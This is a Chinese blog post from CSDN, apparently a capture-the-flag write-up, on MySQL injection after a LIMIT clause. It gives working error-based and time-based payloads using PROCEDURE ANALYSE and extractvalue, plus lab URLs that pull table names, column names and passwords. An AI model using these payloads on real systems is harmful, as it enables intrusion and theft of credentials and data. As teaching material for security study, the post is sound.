在一个limit注入习题下的知识集合

最新推荐文章于 2023-09-25 16:18:22 发布
最新推荐文章于 2023-09-25 16:18:22 发布
阅读量1k 收藏
点赞数 1
文章标签: limit 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zezai3010/article/details/78790742
版权


一、mysql里面的几个函数的解释

(一) Select 查询官方解释

1. SELECT 

2. [ALL | DISTINCT | DISTINCTROW ]  

3. [HIGH_PRIORITY]  

4. [STRAIGHT_JOIN]  

5. [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]  

6. [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]  

7. select_expr [, select_expr ...]  

8. [FROM table_references  

9. [WHERE where_condition]  

10. [GROUP BY {col_name | expr | position}  

11. [ASC | DESC], ... [WITH ROLLUP]]  

12. [HAVING where_condition]  

13. [ORDER BY {col_name | expr | position}  

14. [ASC | DESC], ...]  

15. [LIMIT {[offset,] row_count | row_count OFFSET offset}]  

16. [PROCEDURE procedure_name(argument_list)]  

17. [INTO OUTFILE 'file_name' export_options  

18. INTO DUMPFILE 'file_name' 

19. INTO var_name [, var_name]]  

20. [FOR UPDATE | LOCK IN SHARE MODE]]  

可知如下语句:

Select *****from*****where*****group by*****asc/desc***with rollup*****having*****order by*****asc/desc***limit**procedure*****into****for updata****

也即是select后面还可以有很多标识句构成的语句。

(二) Limit注入解析

1、问题由来:

参考:http://netsecurity.51cto.com/art/201501/464519.htm

 

在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

问题的关键在于,语句中有order by 关键字,我们知道,mysql 中在order by 前面可以使用union 关键字,所以如果注入点前面没有order by 关键字,就可以顺利的使用union 关键字,但是现在的情况是,注入点前面有order by 关键字,这个问题在stackoverflow 上和sla.ckers上都有讨论,但是都没有什么有效的解决办法。

2、问题分析

limit 关键字后面还有 PROCEDURE 和 INTO 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。

尝试用这个存储过程:

1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);  

2. ERROR 1386 (HY000): Can't use ORDER clause with this procedure 

 

ANALYSE支持两个参数,试试两个参数:

1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);  

2. ERROR 1386 (HY000): Can't use ORDER clause with this procedure 

 

依然无效,尝试在 ANALYSE 中插入 sql 语句:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);  

响应如下:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ 

事实证明,sleep 没有被执行,最终,我尝试了如下payload :

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);  

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' 

 

啊哈,上面的方法就是常见的报错注入,所以,如果注入点支持报错,那所有问题都ok,但是如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)  

有意思的是,这里不能用sleep而只能用 BENCHMARK。

3、一些函数解释

1、procedure analyse()

语法如下

select column from table_name procedure analyse();

PROCEDURE ANALYSE 通过分析select查询结果对现有的表的每一列给出优化的建议。

参考:http://blog.csdn.net/yufaw/article/details/7657923

2、ExtractValue()

XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML()

EXTRACTVALUE (XML_document, XPath_string); 
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string (Xpath格式的字符串). 
作用:从目标XML中返回包含所查询值的字符串

UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 
第三个参数:new_value,String格式,替换查找到的符合条件的数据 
作用:改变文档中符合条件的节点的值

3、rand()函数

获取一个随机值

Order by rand():随机排列

4、concat()函数

连接函数,比如连接字符串。

5、Version()

获取版本号

6、

Procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

就是依靠analyse函数,查询版本号,返回信错信息。

 

二、习题解答

0x1 打开网址:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1

发现如下内容:

 

通过对start以及num参数测试,发现只改变start的时候并且num=0或者不为null或者存在的时候,会显示不同界面。

0x2 进行测试

Payloadhttp://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2%df' order by 3 %23

发现都会返回

类似错误。所以肯定是都start以及num进行了limit限制。这就涉及到了limit注入。

0x3 进行limit注入分析

查找网上,发现 可以如下构造:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

返回;

 

返回了版本号,说明存在显错注入。

那么就可以把version()换成sql注入语句。

0x4 常规注入

1 查询数据库

Payload:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2  procedure analyse(extractvalue(rand(),concat(0x3a,database())),1);

得到:

 

2 查询表

Payload

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2  procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=0x6d79646273))),1);

得到:

 

3 查询段

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2  procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1);

得到user表里面的段:

 

id,username,password,lastloginI 共计4个段

4 查询段内容

Payload:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2  procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(password) from user))),1);

得到:

 

得到FLAGmyflagishere

VIS-Wing
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mysql+limit+sql注入_sql注入limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 609
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
Sql注入limit注入的学习
bylfsj的博客
03-19 2500
0x01 前言 今天听学长们交流漏洞挖掘的经验,提到了Limit注入,借此来学习一下limit注入 0x02 知识介绍 limit LIMIT[位置偏移量,]行数 其中,中括号里面的参数是可选参数,位置偏移量是指MySQL查询分析器要从哪一行开始显示,索引值从0开始,即第一条记录位置偏移量是0,第二条记录的位置偏移量是1,依此类推...,第二个参数为“行数”即指示返回的记录条数。 效果如...
SQL注入之order by注入limit注入
m0_46467017的博客
08-09 4095
在MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序) select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;...
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 1948
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
mysql注入limit 注入
Sp4rkW的博客
03-05 4089
limit注入基本常见的分两种场景,存在`order by`与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论~
limit注入_web安全之SQL注入基础
weixin_39608394的博客
12-03 208
本文是web安全系列第一章,主要介绍SQL注入基础。SQL注入基础SQL注入介绍Web请求响应过程:什么是SQL注入?就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。为什么会产生sql注入?开发人员可以使用动态SQL语句创建通用,灵活的应用。动态SQL语句是在执行过程中构造的,...
关于防止sql注入的几个知识
12-14
 它有两个显著优点:  1.1:查询仅需解析一次,但可以用相同或者不同参数执行多次。换句话说如果要以不同的参数执行同样的语句执行多次,利用PDO可以大大降低应用程序的速度。  1.2:提供给预处理的语句不需要...
p-limit:在有限的并发下运行多个承诺返回和异步功能
05-06
p极限在有限的并发下运行多个承诺返回和异步功能安装$ npm install p-limit用法const pLimit = require ( 'p-limit' ) ;const limit = pLimit ( 1 ) ;const input = [limit ( ( ) => fetchSomething ( 'foo' ) ) ,...
mysql优化limit查询语句的5个方法
12-15
mysql的分页比较简单,只需要limit offset,length就可以获取数据了,但是当offset和length比较大的时候,mysql明显性能下降 1.子查询优化法 先找出第一条数据,然后大于等于这条数据的id就是要获取的数据 缺点:...
在MySQL中使用LIMIT进行分页的方法
12-15
今天看一个水友说他的MySQL现在变的很慢。问什么情况时。说单表超过2个G的一个MyISAM。真垃圾的回答方式。  简单答复:换一个强劲的服务器。换服务器很管用的:) ………  最终让取到慢查询:   SELECT * FROM ...
limit-promise:在有限的并发下运行多个承诺返回和异步功能
05-08
limit promise EN: Run multiple promise-returning & async functions with limited concurrency CN: Promise执行数量控制,即"并发"控制(众所周知js是单线程,并不存在真正的并发,只是形象说明才这么称呼的)。 ...
宽字节注入原理分析
热门推荐
1stPeak's Blog
06-07 1万+
什么是宽字节? 如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节 英文默认占一个字节,中文占两个字节 什么是宽字节注入? 原理: 宽字节注入是利用了mysql的一个特性,即mysql在使用GBK编码时,在url解码时会认为两个字符是一个汉字(前一个ASCII码要大于128,才表示到汉字的范围) 通常情况下,一个utf-8编码的汉子占用3个字节,一个GBK编
SQL特殊位置注入:order注入limit注入
最新发布
fly_enum的博客
09-25 734
平常在做测试的过程中,我们经常遇到的sql注入点一般是在where语句后面,但是偶尔也会遇到注入点在order by和limit。这两个位置由于其有一些特殊性,导致一些注入方式不能使用。下面就一起来看看这两个位置如何去注入
MySql关键字
weixin_33940102的博客
02-17 197
MySql关键字 今天写程序的出了点问题,怎么弄都不正确,我也无策,调试了好久突然发现在DB表里用了''check"作为表名,"index“作为字段名,马上检查了一下SQL语句中有没有加安全符“··",果然没.问题就出在这里了,因为index和check都是mysql的关键字, 查了一下,关键字(有的是保留字 )还真是不少.在MySQL中,下表中的字词显...
(三)mysql:,MySQL(三):查询详解
weixin_34121505的博客
03-12 99
一、数据库范式数据库的设计范式是数据库设计所需要满足的规范,满足这些规范的数据库是简洁的、结构明晰的,同时,不会发生插入(insert)、删除(delete)和更新(update)操作异常。反之则是乱七八糟,不仅给数据库的编程人员制造麻烦,而且面目可憎,可能存储了大量不需要的冗余信息。第一范式(1NF)无重复的列所谓第一范式(1NF)是指数据库表的每一列都是不可分割的基本数据项,同一列中不能有多个...
MySQL语法二:数据操纵语句
dieyuanjiao9299的博客
09-30 140
数据操纵语句DML(SELECT,DELETE,UPDATE,INSERT) 一、   数据操纵语句是对数据表中的内容进行操作。比如对某个表中的某条记录或者多条记录进行增删改查操作。   一)、查询 SELECT  [ALL | DISTINCT | DISTINCTROW ]    [HIGH_PRIORITY]    [STRAIGHT_JOIN]    [SQL_SMALL...
order by注入limit注入
lml_0916的博客
08-08 1690
在数据库中,order by的作用是对数据表中查询的数据进行排序的方式。正常情况下我们去查询一个数据库的时候,它显示的顺序可能是根据插入的数据来进行排序的,所以可以通过order by进行排序,方便查看select * from 表名 order by 列名(数字) asc;(升序的) select * from 表名 order by 列名(数字) desc;(降序的)举个例子:正常情况下,用户表的排名是这样的当我们使用命令。...
基于联合查询的字符型GET注入
Z_l123的博客
02-16 920
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
MySQL数据库高阶SQL语句
橘子的博客
06-16 294
数据库SQL语句图文详解
mybatis limit注入修复
09-01
Mybatis是一款流行的Java持久化框架,它使用了SQL映射文件来定义数据库操作。其中的limit注入是指在SQL语句中使用limit关键字来限制查询结果的返回数量,从而实现分页查询。 然而,limit注入可能存在一些安全隐患,容易受到恶意用户的攻击。为了修复这个问题,我们可以采取以下几个步骤: 1. 参数校验:在接收客户端传递的limit参数之前,需要进行严格的参数校验。确保参数的合法性,比如限制传入参数的范围、类型等。 2. 参数绑定:使用Mybatis提供的参数绑定功能来绑定limit参数。这样可以确保limit参数的值是安全可靠的,避免恶意用户通过传入非法参数对数据库进行攻击。 3. 预编译语句:在设置limit参数之前,使用Mybatis的预编译语句功能来对SQL语句进行预处理。这样可以防止恶意用户通过注入攻击修改SQL语句的结构或逻辑。 4. 日志输出:启用Mybatis的日志输出功能,将SQL语句的执行过程输出到日志文件中。这样可以对SQL注入攻击进行监控,并及时发现异常情况。 通过以上措施,我们可以修复Mybatis中的limit注入问题,提高系统的安全性。同时,建议在使用Mybatis时及时更新框架版本,以获取最新的安全补丁和功能改进。此外,也可以结合其他安全框架或工具来进一步加强系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值